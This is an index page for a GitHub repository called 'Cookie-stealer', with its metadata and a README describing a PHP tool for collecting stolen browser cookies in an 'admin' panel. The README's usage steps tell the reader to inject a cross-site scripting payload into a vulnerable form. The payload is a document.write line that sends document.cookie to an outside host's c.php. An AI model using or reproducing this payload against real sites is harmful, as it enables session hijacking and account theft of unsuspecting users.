Ecosyste.ms: Awesome
An open API service indexing awesome lists of open source software.
https://github.com/Xyl2k/Cookie-stealer
Crappy cookie stealer
https://github.com/Xyl2k/Cookie-stealer
Last synced: 15 days ago
JSON representation
Crappy cookie stealer
- Host: GitHub
- URL: https://github.com/Xyl2k/Cookie-stealer
- Owner: Xyl2k
- Created: 2015-02-08T22:17:13.000Z (almost 10 years ago)
- Default Branch: master
- Last Pushed: 2020-11-15T20:01:35.000Z (almost 4 years ago)
- Last Synced: 2024-08-01T16:40:46.495Z (3 months ago)
- Language: PHP
- Size: 3.91 KB
- Stars: 95
- Watchers: 9
- Forks: 52
- Open Issues: 0
-
Metadata Files:
- Readme: README.md
Awesome Lists containing this project
- awesome-termux-hacking - Cookie-stealer - Crappy cookie stealer.[![->](https://img.shields.io/github/stars/Xyl2k/Cookie-stealer.svg?style=social&label=Star&maxAge=2592000)](https://github.com/Xyl2k/Cookie-stealer/stargazers/) (Uncategorized / Uncategorized)
README
![Cookie](https://user-images.githubusercontent.com/8536299/99194653-0f8b8b80-2781-11eb-9415-d4a6efc5920e.png)
# Cookie-stealer
Crappy cookie stealer with 'admin' panel made long time ago..```admin.php``` to view your cookies, ```c.php``` to grab the cookies.
c.php will write the cookies into admin.php, be sure to have write access on your server.### Usage
1. Drop ```admin.php``` and ```c.php``` in the same directory.
2. Go to your vulnerable formulary and send him a payload to your ```c.php?c=``` something like this:
* `document.write("<img src='http://xxxxx.fr/c.php?c="+document.cookie+"'></img>");`
3. Navigate to admin.php, login with username: **root** password: **toor**
4. ???
5. Profit.